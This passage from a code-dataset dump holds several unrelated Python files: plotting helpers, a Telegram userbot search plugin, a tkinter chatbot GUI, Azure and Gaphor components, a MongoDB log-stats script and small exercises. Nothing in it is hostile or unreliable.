eigval, eigvec = mvgauss.eig\n rotated_std_dev = eigval**0.5\n rotation_angle = np.rad2deg(np.arctan2(eigvec[0][1],eigvec[0][0]))\n\n ell = Ellipse(mvgauss.mu,\n 2*chi*rotated_std_dev[0],\n 2*chi*rotated_std_dev[1],\n rotation_angle,\n fill=False)\n return ell\n\ndef plot_principal_axes(mvgauss, ax=None,\n **plot_kwargs):\n \"\"\"\n Plot lines along the principal components, connecting the +/- 1-sigma points.\n \n \"\"\"\n #Calculate the start and end co-ordinates for each principal vector\n start = -1*mvgauss.pcv.add(-mvgauss.mu, axis='index')\n end = mvgauss.pcv.add(mvgauss.mu, axis='index')\n\n if ax is None:\n ax = plt.gca()\n\n # Iterate over the component indices, drawing a line for each\n for c_idx in start:\n line_data = pd.concat((start[c_idx], end[c_idx]), axis=1)\n ax.plot(line_data.iloc[0], line_data.iloc[1], **plot_kwargs)\n return ax\n","repo_name":"4pisky/density-estimation-demos","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26742845175","text":"import asyncio\nimport random\nimport urllib.parse\nfrom pagermaid import Config, log\nfrom pagermaid.listener import listener\nfrom pagermaid.enums import Client, Message, AsyncClient\nfrom pagermaid.utils import lang, pip_install\n\npip_install(\"duckduckgo_search\")\nfrom duckduckgo_search import ddg\n@listener(command=\"ds\", description=\"DuckDuckGo Search\", parameters=\"[text/reply]\")\nasync def duckduckgo(client: Client, message: Message, request: AsyncClient):\n try:\n text = message.arguments or (message.reply_to_message.text if message.reply_to_message else None)\n if not text:\n m = await message.edit(lang('arg_error'))\n await asyncio.sleep(3)\n await m.safe_delete()\n return\n\n text = ' '.join(str(text).splitlines())\n info = await message.edit(f\"🤖正在努力搜索中...\\n\\n{text}\")\n params = {\"q\": text}\n encoded = urllib.parse.urlencode(params)\n url = f\"https://duckduckgo.com?{encoded}\"\n msg = f\"[手动搜索 {text}]({url})\"\n result = {}\n regions = ['us-en', 'cn-zh']\n max_results = 5\n\n for region in regions:\n for i in ddg(text, region=region, safesearch='Off', max_results=max_results):\n result[i['href']] = i['title']\n await asyncio.sleep(random.random())\n\n if result and len(result) > 0:\n links = '\\n'.join(f\"{i+1}. [{v}]({k})\" for i, (k, v) in enumerate(result.items()))\n content = f\"🔎 | **DuckduckGo** | [{text}]({url})\\n\\n{links}\"\n await info.edit(content, disable_web_page_preview=True)\n else:\n await info.edit(f\"搜索失败\\n\\n{msg}\")\n\n except Exception as e:\n emsg = f\"搜索失败:{e}\"\n if msg:\n emsg = f\"搜索失败:{e}\\n\\n{msg}\"\n m = await message.reply(emsg)\n await asyncio.sleep(5)\n await m.safe_delete()\n\n\n","repo_name":"onenora/saber","sub_path":"pgmpyro_plugins/duckduckgo.py","file_name":"duckduckgo.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38184101223","text":"print(\"\"\"________________________________________________________________________________________________________________________________\n _ _ _____ __ \n | | / / / ) / | , / , \n--|-/|-/-----__---/----__----__---_--_----__------_/_----__-------/----/----__---_--_---/__|-------)__---/--------__----__---__-\n |/ |/ /___) / / ' / ) / / ) /___) / / ) / / / ) / / ) / | / / ) / / / ) /___) (_ `\n__/__|____(___ _/___(___ _(___/_/_/__/_(___ _____(_ __(___/_____/____/___(___(_/_/__/_/____|_/___/_____/___/___/___/_(___ _(__)_\"\"\" '\\n')\n\ntry:\n from datetime import datetime\n from datetime import time\n import string\n import random\n\n # booking_day, month and time for flight passenger.\n booking_day = int(input(\"Enter the day: \"))\n booking_month= int(input(\"Enter the month: \"))\n booking_time = int(input(\"Enter a time in the format Hours: \"))\n booking_year = 2022\n\n #booking code\n # code = []\n # for i in range(10):\n # num = random.randint(0,10)\n # alphabet = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z')\n # num_alphabet = code.append(num)\n\n booking_code = ''.join(random.choices(string.ascii_lowercase + string.digits, k = 10))\n\n # datetime object containing current date and time\n now = datetime.now()\n\n # datetime as dt (alias) because datetime from datetime returns error.\n import datetime as dt\n booking_date = dt.datetime(booking_year, booking_month, booking_day, booking_time)\n checkin_start_time = 2\n checkIn_hours = dt.datetime(booking_year, booking_month, booking_day, checkin_start_time)\n if booking_date > now:\n checkIn_time = booking_time - checkin_start_time\n if checkIn_time <= checkin_start_time:\n checkIn_time += 24\n checkIn_time = str(checkIn_time) + ':' + '00' + ':' + '00.'\n print(\"\\n\" \"Thank You for booking with DamAirlines, Your booking date is\", booking_date, \"and your booking number is\", booking_code,\".\" '\\n' \"Your check-in time is from\", checkIn_time,\n \"Kindly check your email for booking confirmation.\")\n else:\n print(\"Error! Past date cannot be entered\")\n\nexcept( TypeError, ValueError, NameError):\n print(\"Please Enter a valid date\")\n\n\n","repo_name":"damosman/My-Projects","sub_path":"Exceptions.py","file_name":"Exceptions.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"71054434605","text":"import logging\r\nimport azure.functions as func\r\n\r\napp = func.FunctionApp()\r\n\r\n@app.function_name(name=\"AzureFunctionInputOutputBinding\")\r\n@app.route(route=\"hello\")\r\n@app.blob_input(arg_name=\"inputblob\",\r\n path=\"inputbinding/ReadMe.txt\",\r\n connection=\"BLOB_CONNECTION_SETTING\")\r\n@app.blob_output(arg_name=\"outputblob\",\r\n path=\"outputbinding/test.txt\",\r\n connection=\"BLOB_CONNECTION_SETTING\")\r\ndef main(req: func.HttpRequest, inputblob: str, outputblob: func.Out[str]):\r\n logging.info(f'Python Queue trigger function processed {len(inputblob)} bytes')\r\n outputblob.set(inputblob)\r\n return \"ok\"","repo_name":"Pawanesh/AzureCloud","sub_path":"AzureFunctionInputOutputBinding/function_app.py","file_name":"function_app.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11424505768","text":"from __future__ import absolute_import\nfrom gaphor.adapters.connectors import AbstractConnect\nfrom zope import interface, component\nfrom gaphor.UML import uml2\nfrom gaphor.diagram import items\n\nclass MessageLifelineConnect(AbstractConnect):\n \"\"\"\n Connect lifeline with a message.\n\n A message can connect to both the lifeline's head (the rectangle)\n or the lifetime line. In case it's added to the head, the message\n is considered to be part of a communication diagram. If the message is\n added to a lifetime line, it's considered a sequence diagram.\n \"\"\"\n\n component.adapts(items.LifelineItem, items.MessageItem)\n\n def connect_lifelines(self, line, send, received):\n \"\"\"\n Always create a new Message with two EventOccurence instances.\n \"\"\"\n def get_subject():\n if not line.subject:\n message = self.element_factory.create(uml2.Message)\n message.name = 'call()'\n line.subject = message\n return line.subject\n\n if send:\n message = get_subject()\n if not message.sendEvent:\n event = self.element_factory.create(uml2.MessageOccurrenceSpecification)\n event.sendMessage = message\n event.covered = send.subject\n\n if received:\n message = get_subject()\n if not message.receiveEvent:\n event = self.element_factory.create(uml2.MessageOccurrenceSpecification)\n event.receiveMessage = message\n event.covered = received.subject\n\n\n def disconnect_lifelines(self, line):\n \"\"\"\n Disconnect lifeline and set appropriate kind of message item. If\n there are no lifelines connected on both ends, then remove the message\n from the data model.\n \"\"\"\n send = self.get_connected(line.head)\n received = self.get_connected(line.tail)\n\n if send:\n event = line.subject.receiveEvent\n if event:\n event.unlink()\n\n if received:\n event = line.subject.sendEvent\n if event:\n event.unlink()\n\n # one is disconnected and one is about to be disconnected,\n # so destroy the message\n if not send or not received:\n # Both ends are disconnected:\n message = line.subject\n del line.subject\n if not message.presentation:\n message.unlink()\n for message in list(line._messages):\n line.remove_message(message, False)\n message.unlink()\n\n for message in list(line._inverted_messages):\n line.remove_message(message, True)\n message.unlink()\n\n\n def allow(self, handle, port):\n \"\"\"\n Glue to lifeline's head or lifetime. If lifeline's lifetime is\n visible then disallow connection to lifeline's head.\n \"\"\"\n element = self.element\n lifetime = element.lifetime\n line = self.line\n opposite = line.opposite(handle)\n\n ol = self.get_connected(opposite)\n if ol:\n opposite_is_visible = ol.lifetime.visible\n # connect lifetimes if both are visible or both invisible\n return not (lifetime.visible ^ opposite_is_visible)\n\n return not (lifetime.visible ^ (port is element.lifetime.port))\n \n\n def connect(self, handle, port):\n super(MessageLifelineConnect, self).connect(handle, port)\n\n line = self.line\n send = self.get_connected(line.head)\n received = self.get_connected(line.tail)\n self.connect_lifelines(line, send, received)\n\n lifetime = self.element.lifetime\n # if connected to head, then make lifetime invisible\n if port is lifetime.port:\n lifetime.min_length = lifetime.MIN_LENGTH_VISIBLE\n else:\n lifetime.visible = False\n lifetime.connectable = False\n\n\n def disconnect(self, handle):\n super(MessageLifelineConnect, self).disconnect(handle)\n\n line = self.line\n send = self.get_connected(line.head)\n received = self.get_connected(line.tail)\n lifeline = self.element\n lifetime = lifeline.lifetime\n\n # if a message is delete message, then disconnection causes\n # lifeline to be no longer destroyed (note that there can be\n # only one delete message connected to lifeline)\n if received and line.subject.messageSort == 'deleteMessage':\n received.is_destroyed = False\n received.request_update()\n\n self.disconnect_lifelines(line)\n\n if len(list(self.canvas.get_connections(connected=lifeline))) == 1:\n # after disconnection count of connected items will be\n # zero, so allow connections to lifeline's lifetime\n lifetime.connectable = True\n lifetime.min_length = lifetime.MIN_LENGTH\n \n\n\ncomponent.provideAdapter(MessageLifelineConnect)\n\n","repo_name":"gitter-badger/dabbler","sub_path":"gaphor/adapters/interactions/messageconnect.py","file_name":"messageconnect.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4255230578","text":"import nltk\nfrom nltk.stem import WordNetLemmatizer\nlemmatizer = WordNetLemmatizer()\nimport pickle\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nmodel = load_model('chatbot_model.h5')\nimport json\nimport random\nimport string\nimport tkinter\nfrom tkinter import PhotoImage\nfrom tkinter import *\nimport time\nimport threading\nimport tkinter.messagebox\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\nimport tempfile, base64, zlib\nimport logging\nimport datetime\nimport os\n\n\nintents = json.loads(open('intents.json').read())\nwords = pickle.load(open('words.pkl','rb'))\nclasses = pickle.load(open('classes.pkl','rb'))\n\ndef bag_of_words(s, words):\n bag = [0 for _ in range(len(words))]\n\n s_words = nltk.word_tokenize(s)\n s_words = [stemmer.stem(word.lower()) for word in s_words]\n\n for se in s_words:\n for i, w in enumerate(words):\n if w == se:\n bag[i] = 1\n \n return np.array(bag)\n\ndef clean_up_sentence(sentence):\n # tokenize the pattern - split words into array\n sentence_words = nltk.word_tokenize(sentence)\n # stem each word - create short form for word\n sentence_words = [lemmatizer.lemmatize(word.lower()) for word in sentence_words]\n return sentence_words\n# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence\ndef bow(sentence, words, show_details=True):\n # tokenize the pattern\n sentence_words = clean_up_sentence(sentence)\n # bag of words - matrix of N words, vocabulary matrix\n bag = [0]*len(words) \n for s in sentence_words:\n for i,w in enumerate(words):\n if w == s: \n # assign 1 if current word is in the vocabulary position\n bag[i] = 1\n if show_details:\n print (\"found in bag: %s\" % w)\n return(np.array(bag))\n\ndef getResponse(sentence, model, intents_json): \n threshold=0.6\n results = model.predict(np.array([bag_of_words(sentence, words)]))[0]\n # sort by strength of probability\n results_index = np.argmax(results)\n tag = classes[results_index]\n # If probability below threshold ask users to try another question\n if results[results_index] > threshold:\n for tg in intents_json[\"intents\"]:\n if tg['tag'] == tag:\n responses = tg['responses']\n result= random.choice(responses)\n return result\n else:\n result2= string.capwords(\"I didn't quite get that, try again or ask another question.\")\n logger.info('Unsupported question: %s' % sentence)\n return result2\n\ndef chatbot_response(text):\n res = getResponse(text, model, intents)\n return res\ndef send():\n msg = EntryBox.get(\"1.0\",'end-1c').strip()\n EntryBox.delete(\"0.0\",END)\n if msg != '':\n ChatLog.config(state=NORMAL)\n ChatLog.insert(END, \"You: \" + msg + '\\n\\n')\n ChatLog.config(foreground=\"#442265\", font=(\"Verdana\", 12 ))\n res = chatbot_response(msg)\n ChatLog.insert(END, \"Bot: \" + res + '\\n\\n')\n ChatLog.config(state=DISABLED)\n ChatLog.yview(END)\n\nsaved_username = [\"You\"]\nwindow_size=\"600x300\"\n\nclass ChatInterface(Frame):\n\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n\n # sets default bg for top level windows\n self.tl_bg = \"#EEEEEE\"\n self.tl_bg2 = \"#EEEEEE\"\n self.tl_fg = \"#000000\"\n self.font = \"Verdana 10\"\n\n menu = Menu(self.master)\n self.master.config(menu=menu, bd=5)\n\n# Menu bar\n\n # File\n file = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"File\", menu=file)\n file.add_command(label=\"Clear Chat\", command=self.clear_chat)\n file.add_command(label=\"Exit\",command=self.chatexit)\n \n # Options\n options = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Options\", menu=options) \n\n \n # font\n font = Menu(options, tearoff=0)\n options.add_cascade(label=\"Font\", menu=font)\n font.add_command(label=\"Default\",command=self.font_change_default)\n font.add_command(label=\"Times\",command=self.font_change_times)\n font.add_command(label=\"System\",command=self.font_change_system)\n font.add_command(label=\"Helvetica\",command=self.font_change_helvetica)\n font.add_command(label=\"Fixedsys\",command=self.font_change_fixedsys)\n\n # color theme\n color_theme = Menu(options, tearoff=0)\n options.add_cascade(label=\"Color Theme\", menu=color_theme)\n color_theme.add_command(label=\"Default\",command=self.color_theme_default) \n color_theme.add_command(label=\"Grey\",command=self.color_theme_grey) \n color_theme.add_command(label=\"Blue\",command=self.color_theme_dark_blue) \n color_theme.add_command(label=\"Torque\",command=self.color_theme_turquoise)\n\n\n \n help_option = Menu(menu, tearoff=0)\n menu.add_cascade(label=\"Help\", menu=help_option)\n help_option.add_command(label=\"About Squirro Bot\", command=self.msg)\n \n\n self.text_frame = Frame(self.master, bd=6)\n self.text_frame.pack(expand=True, fill=BOTH)\n\n # scrollbar for text box\n self.text_box_scrollbar = Scrollbar(self.text_frame, bd=0)\n self.text_box_scrollbar.pack(fill=Y, side=RIGHT)\n\n # contains messages\n self.text_box = Text(self.text_frame, yscrollcommand=self.text_box_scrollbar.set, state=DISABLED,\n bd=2, padx=6, pady=6, spacing3=8, wrap=WORD, bg=None, font=\"Verdana 10\", relief=GROOVE,\n width=10, height=1)\n self.text_box.pack(expand=True, fill=BOTH)\n self.text_box_scrollbar.config(command=self.text_box.yview)\n\n # frame containing user entry field\n self.entry_frame = Frame(self.master, bd=1)\n self.entry_frame.pack(side=LEFT, fill=BOTH, expand=True)\n\n # entry field\n self.entry_field = Entry(self.entry_frame, bd=2, justify=LEFT)\n self.entry_field.pack(fill=X, padx=6, pady=6, ipady=6)\n \n\n # frame containing send button and emoji button\n self.send_button_frame = Frame(self.master, bd=0)\n self.send_button_frame.pack(fill=BOTH)\n\n # send button\n \n root.geometry(\"960x600\") \n snd_button = PhotoImage(file=\"paper-plane.png\")\n root.title(\"Squirro Bot\") \n root.iconbitmap('favicon.ico')\n\n self.send_button = Button(self.send_button_frame, image=snd_button, borderwidth=0,\n command=lambda: self.send_message_insert(None))\n self.send_button.pack(side=RIGHT, ipady=8)\n self.master.bind(\"\", self.send_message_insert)\n \n self.last_sent_label(date=\"No messages sent.\")\n root.mainloop()\n \n def last_sent_label(self, date):\n\n try:\n self.sent_label.destroy()\n except AttributeError:\n pass\n\n self.sent_label = Label(self.entry_frame, font=\"Verdana 7\", text=date, bg=self.tl_bg2, fg=self.tl_fg)\n self.sent_label.pack(side=LEFT, fill=X, padx=3)\n\n def clear_chat(self):\n self.text_box.config(state=NORMAL)\n self.last_sent_label(date=\"No messages sent.\")\n self.text_box.delete(1.0, END)\n self.text_box.delete(1.0, END)\n self.text_box.config(state=DISABLED)\n\n def chatexit(self):\n exit()\n \n def msg(self):\n tkinter.messagebox.showinfo(\"Squirro Bot v1.0\",'Squirro Bot is a chatbot for answering Squirro queries')\n \n\n def send_message_insert(self, message):\n user_input = self.entry_field.get()\n pr1 = \"Me : \" + user_input + \"\\n\"\n self.text_box.configure(state=NORMAL)\n self.text_box.insert(END, pr1)\n self.text_box.configure(state=DISABLED)\n self.text_box.see(END)\n msg = \"Squirro Bot : \"\n ob=chatbot_response(user_input)\n pr=msg + ob + \"\\n\"\n self.text_box.configure(state=NORMAL)\n self.text_box.insert(END, pr)\n self.text_box.configure(state=DISABLED)\n self.text_box.see(END)\n self.last_sent_label(str(time.strftime( \"Last message sent: \" + '%B %d, %Y' + ' at ' + '%I:%M %p')))\n self.entry_field.delete(0,END)\n time.sleep(0)\n\n \n def font_change_default(self):\n self.text_box.config(font=\"Verdana 10\")\n self.entry_field.config(font=\"Verdana 10\")\n self.font = \"Verdana 10\"\n\n def font_change_times(self):\n self.text_box.config(font=\"Times\")\n self.entry_field.config(font=\"Times\")\n self.font = \"Times\"\n\n def font_change_system(self):\n self.text_box.config(font=\"System\")\n self.entry_field.config(font=\"System\")\n self.font = \"System\"\n\n def font_change_helvetica(self):\n self.text_box.config(font=\"helvetica 10\")\n self.entry_field.config(font=\"helvetica 10\")\n self.font = \"helvetica 10\"\n\n def font_change_fixedsys(self):\n self.text_box.config(font=\"fixedsys\")\n self.entry_field.config(font=\"fixedsys\")\n self.font = \"fixedsys\"\n\n def color_theme_default(self):\n self.master.config(bg=\"#EEEEEE\")\n self.text_frame.config(bg=\"#EEEEEE\")\n self.entry_frame.config(bg=\"#EEEEEE\")\n self.text_box.config(bg=\"#FFFFFF\", fg=\"#000000\")\n self.entry_field.config(bg=\"#FFFFFF\", fg=\"#000000\", insertbackground=\"#000000\")\n self.send_button_frame.config(bg=\"#EEEEEE\")\n self.send_button.config(bg=\"#FFFFFF\", fg=\"#000000\", activebackground=\"#FFFFFF\", activeforeground=\"#000000\")\n self.sent_label.config(bg=\"#EEEEEE\", fg=\"#000000\")\n\n self.tl_bg = \"#FFFFFF\"\n self.tl_bg2 = \"#EEEEEE\"\n self.tl_fg = \"#000000\"\n\n # Dark\n def color_theme_dark(self):\n self.master.config(bg=\"#2a2b2d\")\n self.text_frame.config(bg=\"#2a2b2d\")\n self.text_box.config(bg=\"#212121\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#2a2b2d\")\n self.entry_field.config(bg=\"#212121\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#2a2b2d\")\n self.send_button.config(bg=\"#212121\", fg=\"#FFFFFF\", activebackground=\"#212121\", activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#2a2b2d\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#212121\"\n self.tl_bg2 = \"#2a2b2d\"\n self.tl_fg = \"#FFFFFF\"\n\n # Grey\n def color_theme_grey(self):\n self.master.config(bg=\"#444444\")\n self.text_frame.config(bg=\"#444444\")\n self.text_box.config(bg=\"#4f4f4f\", fg=\"#ffffff\")\n self.entry_frame.config(bg=\"#444444\")\n self.entry_field.config(bg=\"#4f4f4f\", fg=\"#ffffff\", insertbackground=\"#ffffff\")\n self.send_button_frame.config(bg=\"#444444\")\n self.send_button.config(bg=\"#4f4f4f\", fg=\"#ffffff\", activebackground=\"#4f4f4f\", activeforeground=\"#ffffff\")\n self.sent_label.config(bg=\"#444444\", fg=\"#ffffff\")\n\n self.tl_bg = \"#4f4f4f\"\n self.tl_bg2 = \"#444444\"\n self.tl_fg = \"#ffffff\"\n\n\n def color_theme_turquoise(self):\n self.master.config(bg=\"#003333\")\n self.text_frame.config(bg=\"#003333\")\n self.text_box.config(bg=\"#669999\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#003333\")\n self.entry_field.config(bg=\"#669999\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#003333\")\n self.send_button.config(bg=\"#669999\", fg=\"#FFFFFF\", activebackground=\"#669999\", activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#003333\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#669999\"\n self.tl_bg2 = \"#003333\"\n self.tl_fg = \"#FFFFFF\" \n\n # Blue\n def color_theme_dark_blue(self):\n self.master.config(bg=\"#263b54\")\n self.text_frame.config(bg=\"#263b54\")\n self.text_box.config(bg=\"#1c2e44\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#263b54\")\n self.entry_field.config(bg=\"#1c2e44\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#263b54\")\n self.send_button.config(bg=\"#1c2e44\", fg=\"#FFFFFF\", activebackground=\"#1c2e44\", activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#263b54\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#1c2e44\"\n self.tl_bg2 = \"#263b54\"\n self.tl_fg = \"#FFFFFF\"\n\n \n \n\n # Torque\n def color_theme_turquoise(self):\n self.master.config(bg=\"#003333\")\n self.text_frame.config(bg=\"#003333\")\n self.text_box.config(bg=\"#669999\", fg=\"#FFFFFF\")\n self.entry_frame.config(bg=\"#003333\")\n self.entry_field.config(bg=\"#669999\", fg=\"#FFFFFF\", insertbackground=\"#FFFFFF\")\n self.send_button_frame.config(bg=\"#003333\")\n self.send_button.config(bg=\"#669999\", fg=\"#FFFFFF\", activebackground=\"#669999\", activeforeground=\"#FFFFFF\")\n self.sent_label.config(bg=\"#003333\", fg=\"#FFFFFF\")\n\n self.tl_bg = \"#669999\"\n self.tl_bg2 = \"#003333\"\n self.tl_fg = \"#FFFFFF\"\n\n \n\n # Default font and color theme\n def default_format(self):\n self.font_change_default()\n self.color_theme_default() \n \n \n# Create application logger\nlogger_name = 'app_logger'\nlogger_level = logging.DEBUG\nlogger = logging.getLogger(logger_name)\nlogger.setLevel(logger_level)\n\n# Create file handler\nlog_file_name = 'chatbot_logs.log'\nlog_folder_path = '//sd1filepw11/apps/W Drive New Structure/Regulatory Operations/Chief Operating Office/Innovation/SquirroBotLogs'\nlog_file_path = os.path.join(log_folder_path, log_file_name)\nfile_handler = logging.FileHandler(log_file_path)\nfile_handler.setLevel(logger_level)\n\n# Create console handler\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logger_level)\n\n# Format log messages\nlog_message_format = '[%(asctime)s] [%(levelname)s] [%(filename)s] [Line %(lineno)s] %(message)s'\nlog_message_date_format = '%Y-%m-%d %H:%M:%S'\nlog_formatter = logging.Formatter(log_message_format, log_message_date_format)\nfile_handler.setFormatter(log_formatter)\nconsole_handler.setFormatter(log_formatter)\n\n# Add the handlers to the logger\nlogger.addHandler(file_handler)\nlogger.addHandler(console_handler)\n\n \nroot=Tk()\n\n\na = ChatInterface(root)\nroot.geometry(window_size)\nroot.mainloop()\n\n\n","repo_name":"1tua/chatbot","sub_path":"Chatbot_GUI_03.py","file_name":"Chatbot_GUI_03.py","file_ext":"py","file_size_in_byte":14293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45512398115","text":"from typing import Optional\n\nfrom fastapi import FastAPI\nfrom glassio.dispatcher import IDispatcher\nfrom glassio.initializable_components import AbstractInitializableComponent\n\nfrom amocrm_asterisk_ng.domain import IsUserPhoneNumerQuery\n\nfrom ...core import IGetUsersEmailAddressesQuery\n\nfrom .functions import GetUsersEmailAddressesQuery\nfrom .functions import IsUserPhoneNumerQueryImpl\nfrom .WidgetView import WidgetView\nfrom .AsteriskWidgetConfig import AsteriskWidgetConfig\n\n\n__all__ = [\n \"AsteriskWidgetComponent\",\n]\n\n\nclass AsteriskWidgetComponent(AbstractInitializableComponent):\n\n __slots__ = (\n \"__config\",\n \"__app\",\n \"__dispatcher\",\n \"__widget_view\",\n )\n\n def __init__(\n self,\n config: AsteriskWidgetConfig,\n app: FastAPI,\n dispatcher: IDispatcher,\n widget_view: WidgetView,\n ) -> None:\n super().__init__()\n self.__config = config\n self.__app = app\n self.__dispatcher = dispatcher\n self.__widget_view = widget_view\n\n async def _initialize(self) -> None:\n\n self.__app.add_route(\n \"/amocrm/calls\",\n self.__widget_view.handle,\n methods=[\"GET\"]\n )\n\n self.__dispatcher.add_function(\n function_type=IGetUsersEmailAddressesQuery,\n function=GetUsersEmailAddressesQuery(\n users=self.__config.users,\n )\n )\n self.__dispatcher.add_function(\n function_type=IsUserPhoneNumerQuery,\n function=IsUserPhoneNumerQueryImpl(\n users=self.__config.users,\n )\n )\n\n async def _deinitialize(self, exception: Optional[Exception] = None) -> None:\n self.__dispatcher.delete_function(IsUserPhoneNumerQuery)\n self.__dispatcher.delete_function(IGetUsersEmailAddressesQuery)\n","repo_name":"FRANTSSS/amocrm_asterisk_ng","sub_path":"amocrm_asterisk_ng/crm/amocrm/widgets/asterisk_widget/AsteriskWidgetComponent.py","file_name":"AsteriskWidgetComponent.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"74241636844","text":"# https://leetcode.com/problems/implement-strstr/\n# Implement strStr().\n# Given two strings needle and haystack, return the index of the first occurrence of needle in haystack,\n# or -1 if needle is not part of haystack.\n# Clarification:\n# What should we return when needle is an empty string? This is a great question to ask during an interview.\n# For the purpose of this problem, we will return 0 when needle is an empty string.\n# This is consistent to C's strstr() and Java's indexOf().\nclass Solution:\n # алгоритм KMP (Кнута-Морриса-Пратта)\n @staticmethod\n def prefix_func(s: str):\n n = len(s)\n pi = [0] * n\n for i in range(1, n):\n p = pi[i - 1]\n while s[i] != s[p] and p > 0:\n p = pi[p - 1]\n if s[i] == s[p]:\n p += 1\n pi[i] = p\n return pi\n\n def str_str(self, haystack: str, needle: str) -> int:\n if not needle:\n return 0\n ls = len(needle)\n p = self.prefix_func(needle + '#' + haystack)\n for i in range(len(p)):\n if p[i] == ls:\n return i - 2 * ls\n return -1\n\n\ndef test0():\n h = 'sdndashjkasdjhaggdggjskasjhd'\n n = 'sdjha'\n print(Solution().str_str(h, n), h.find(n))\n\n\nif __name__ == '__main__':\n test0()\n","repo_name":"diwert-ai/Problems","sub_path":"Problems/Leetcode/Easy/28. implement strStr().py","file_name":"28. implement strStr().py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71290742764","text":"NUM, IMG_SIZE, FACE = 8, 720, False\n\nconfig = lambda: None\nconfig.expName = None\nconfig.checkpoint_dir = None\nconfig.train = lambda: None\nconfig.train.batch_size = 4\nconfig.train.lr = 0.001\nconfig.train.decay = 0.001\nconfig.train.epochs = 10\nconfig.latent_code_garms_sz = 1024\n\nconfig.PCA_=35\nconfig.garmentKeys = ['Pants', 'ShortPants', 'ShirtNoCoat', 'TShirtNoCoat', 'LongCoat']\nconfig.NVERTS = 27554","repo_name":"bharat-b7/MultiGarmentNetwork","sub_path":"config_ver1.py","file_name":"config_ver1.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"19"} +{"seq_id":"3635712898","text":"def myfun(a,b):\r\n if src=='avadi' and des=='ponamalle':\r\n print(\"the amount is 50\")\r\n elif src=='avadi' and des=='redhills':\r\n print(\"the amount is 80\")\r\n else:\r\n print(\"check the enter location\")\r\n\r\n\r\n\r\nsrc=raw_input(\"enter the src\")\r\ndes=raw_input(\"enter the des\")\r\nmyfun(src,des)\r\n","repo_name":"meera-mai/python-programs","sub_path":"uber bill.py","file_name":"uber bill.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"50478121973","text":"#!/usr/bin/env python3\n\"\"\"\nProvides some stats about Nginx logs stored in MongoDB\nDatabase: logs\nCollection: nginx\n\"\"\"\n\nfrom pymongo import MongoClient\n\ndef log_stats(mongo_collection):\n \"\"\"\n Provides statistics about Nginx logs stored in MongoDB.\n \"\"\"\n # Total logs count\n total_logs = mongo_collection.count_documents({})\n\n # Methods count\n methods = [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]\n methods_counts = {method: mongo_collection.count_documents({\"method\": method}) for method in methods}\n\n # Status check count\n status_check = mongo_collection.count_documents({\"method\": \"GET\", \"path\": \"/status\"})\n\n # IPs top 10\n pipeline = [\n {\"$group\": {\"_id\": \"$ip\", \"count\": {\"$sum\": 1}}},\n {\"$sort\": {\"count\": -1}},\n {\"$limit\": 10}\n ]\n ip_counts = list(mongo_collection.aggregate(pipeline))\n\n print(f\"{total_logs} logs\")\n print(\"Methods:\")\n for method, count in methods_counts.items():\n print(f\"\\tmethod {method}: {count}\")\n print(f\"{status_check} status check\")\n print(\"IPs:\")\n for ip_count in ip_counts:\n print(f\"\\t{ip_count['_id']}: {ip_count['count']}\")\n\nif __name__ == \"__main__\":\n client = MongoClient('mongodb://127.0.0.1:27017')\n logs_db = client.logs\n nginx_collection = logs_db.nginx\n\n log_stats(nginx_collection)\n\n","repo_name":"chibwesamuel/alx-backend-storage","sub_path":"0x01-NoSQL/102-log_stats.py","file_name":"102-log_stats.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15669653950","text":"import numpy as np\nfrom PIL import ImageTk, Image\nimport matplotlib.pyplot as plt\n\nvariables = [\"FS_t1_dxy\", \"FS_t1_eta\", 